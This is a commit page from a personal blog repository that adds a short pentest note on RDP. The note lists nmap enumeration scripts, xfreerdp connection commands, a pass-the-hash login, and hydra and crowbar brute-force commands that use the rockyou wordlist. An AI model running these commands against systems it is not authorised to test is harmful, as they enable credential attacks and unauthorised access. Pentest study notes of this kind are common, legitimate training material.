anotherhadi/blog
1
Fork 0
mirror of https://github.com/anotherhadi/blog.git synced 2026-05-20 05:32:32 +02:00
Code Issues Packages Projects Releases Wiki Activity

Init RDP

Browse Source 
Signed-off-by: Hadi <hadi@example.com>
This commit is contained in:
Hadi
2026-05-04 14:17:54 +02:00
parent b4b755b608
commit c314445219
1 changed files with 46 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
src/content/notes/network/rdp.md
+46
View File
@@ -0,0 +1,46 @@
---
title: "RDP"
description: "Enumeration, exploitation and post-exploitation techniques for RDP servers."
tags: ["rdp", "network", "service"]
publishDate: 2026-05-04
---
## Overview
RDP (Remote Desktop Protocol) runs on **port 3389** and provides a graphical remote session.
Common on Windows servers and workstations.
## Enumeration
### Banner grabbing
```bash
nmap -sV -p 3389 $IP
nmap -p 3389 --script rdp-* $IP
```
Key scripts:
- `rdp-enum-encryption`: checks encryption level
- `rdp-vuln-ms12-020`: tests for MS12-020 DoS vulnerability
## Connect
```bash
xfreerdp /u:$user /p:$password /v:$IP
xfreerdp /u:$user /p:$password /v:$IP /cert:ignore
rdesktop $IP
```
Pass the hash directly (no plaintext password needed):
```bash
xfreerdp /u:$user /pth:$hash /v:$IP
```
## Brute Force
```bash
hydra -l $user -P ~/wordlists/rockyou.txt rdp://$IP
crowbar -b rdp -s $IP/32 -u $user -C ~/wordlists/rockyou.txt
```